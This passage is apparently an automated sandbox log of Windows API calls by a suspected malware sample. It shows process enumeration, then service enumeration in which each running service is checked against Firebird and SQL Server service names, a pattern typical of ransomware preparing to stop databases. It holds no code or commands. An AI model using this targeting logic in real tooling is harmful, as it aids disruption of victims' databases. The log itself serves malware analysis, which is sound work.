lpString2="RpcEptMapper") returned -1 [0198.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0198.647] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0198.647] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0198.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0198.648] lstrlenW (lpString="RpcSs") returned 5 [0198.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0198.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0198.648] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0198.648] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0198.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0198.648] lstrlenW (lpString="SamSs") returned 5 [0198.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0198.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0198.648] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0198.648] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0198.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0198.648] lstrlenW (lpString="Schedule") returned 8 [0198.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0198.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0198.648] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0198.648] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0198.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0198.648] lstrlenW (lpString="SecurityHealthService") returned 21 [0198.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0198.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0198.648] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0198.648] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0198.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0198.648] lstrlenW (lpString="SENS") returned 4 [0198.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0198.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0198.648] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0198.648] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0198.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0198.649] lstrlenW (lpString="ShellHWDetection") returned 16 [0198.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0198.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0198.649] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0198.649] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0198.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0198.649] lstrlenW (lpString="Spooler") returned 7 [0198.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0198.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0198.649] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0198.649] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0198.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0198.649] lstrlenW (lpString="StateRepository") returned 15 [0198.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0198.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0198.649] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0198.649] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0198.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0198.649] lstrlenW (lpString="SysMain") returned 7 [0198.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0198.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0198.649] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0198.649] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0198.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0198.649] lstrlenW (lpString="SystemEventsBroker") returned 18 [0198.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0198.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0198.649] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0198.649] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0198.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0198.650] lstrlenW (lpString="Themes") returned 6 [0198.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0198.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0198.650] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0198.650] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0198.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0198.650] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0198.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0198.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0198.650] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0198.650] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0198.650] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x368 [0198.653] Process32FirstW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.653] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0198.654] lstrlenW (lpString="System") returned 6 [0198.654] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0198.655] lstrlenW (lpString="smss.exe") returned 8 [0198.655] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0198.655] lstrlenW (lpString="csrss.exe") returned 9 [0198.655] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0198.656] lstrlenW (lpString="wininit.exe") returned 11 [0198.656] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0198.656] lstrlenW (lpString="csrss.exe") returned 9 [0198.656] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0198.657] lstrlenW (lpString="winlogon.exe") returned 12 [0198.657] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0198.658] lstrlenW (lpString="services.exe") returned 12 [0198.658] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0198.658] lstrlenW (lpString="lsass.exe") returned 9 [0198.710] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0198.711] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0198.711] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0198.712] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0198.712] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.713] lstrlenW (lpString="svchost.exe") returned 11 [0198.713] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.714] lstrlenW (lpString="svchost.exe") returned 11 [0198.714] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0198.714] lstrlenW (lpString="dwm.exe") returned 7 [0198.714] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.715] lstrlenW (lpString="svchost.exe") returned 11 [0198.715] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.716] lstrlenW (lpString="svchost.exe") returned 11 [0198.716] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.801] lstrlenW (lpString="svchost.exe") returned 11 [0198.801] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.801] lstrlenW (lpString="svchost.exe") returned 11 [0198.801] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.802] lstrlenW (lpString="svchost.exe") returned 11 [0198.802] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.803] lstrlenW (lpString="svchost.exe") returned 11 [0198.803] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.807] lstrlenW (lpString="svchost.exe") returned 11 [0198.807] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.807] lstrlenW (lpString="svchost.exe") returned 11 [0198.807] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.808] lstrlenW (lpString="svchost.exe") returned 11 [0198.808] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.808] lstrlenW (lpString="svchost.exe") returned 11 [0198.809] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0198.809] lstrlenW (lpString="spoolsv.exe") returned 11 [0198.809] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.810] lstrlenW (lpString="svchost.exe") returned 11 [0198.810] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0198.810] lstrlenW (lpString="audiodg.exe") returned 11 [0198.810] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0198.811] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0198.811] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0198.812] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0198.812] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0198.812] lstrlenW (lpString="Memory Compression") returned 18 [0198.812] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0198.814] lstrlenW (lpString="sihost.exe") returned 10 [0198.814] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.816] lstrlenW (lpString="svchost.exe") returned 11 [0198.816] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0198.817] lstrlenW (lpString="msoia.exe") returned 9 [0198.817] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0198.817] lstrlenW (lpString="taskhostw.exe") returned 13 [0198.817] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.818] lstrlenW (lpString="explorer.exe") returned 12 [0198.818] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0198.818] lstrlenW (lpString="SearchUI.exe") returned 12 [0198.818] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0198.819] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0198.819] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0198.820] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0198.820] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0198.820] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0198.820] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0198.821] lstrlenW (lpString="hgaibc.exe") returned 10 [0198.821] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0198.822] CloseHandle (hObject=0x368) returned 1 [0198.822] Sleep (dwMilliseconds=0x1f4) [0199.482] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6beef8 [0199.483] EnumServicesStatusExW (in: hSCManager=0x6beef8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0199.483] GetLastError () returned 0xea [0199.483] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d97a8 [0199.483] EnumServicesStatusExW (in: hSCManager=0x6beef8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d97a8, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d97a8, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0199.484] CloseServiceHandle (hSCObject=0x6beef8) returned 1 [0199.484] lstrlenW (lpString="Appinfo") returned 7 [0199.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0199.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0199.484] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0199.484] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0199.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0199.484] lstrlenW (lpString="AppXSvc") returned 7 [0199.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0199.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0199.484] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0199.484] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0199.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0199.484] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0199.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0199.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0199.484] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0199.485] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0199.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0199.485] lstrlenW (lpString="Audiosrv") returned 8 [0199.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0199.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0199.485] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0199.485] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0199.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0199.485] lstrlenW (lpString="BFE") returned 3 [0199.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0199.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0199.485] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0199.485] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0199.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0199.485] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0199.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0199.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0199.485] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0199.485] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0199.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0199.485] lstrlenW (lpString="CDPSvc") returned 6 [0199.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0199.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0199.485] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0199.485] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0199.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0199.485] lstrlenW (lpString="ClickToRunSvc") returned 13 [0199.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0199.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0199.486] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0199.486] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0199.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0199.486] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0199.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0199.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0199.486] lstrcmpiW (lpString1="sqlwriter", 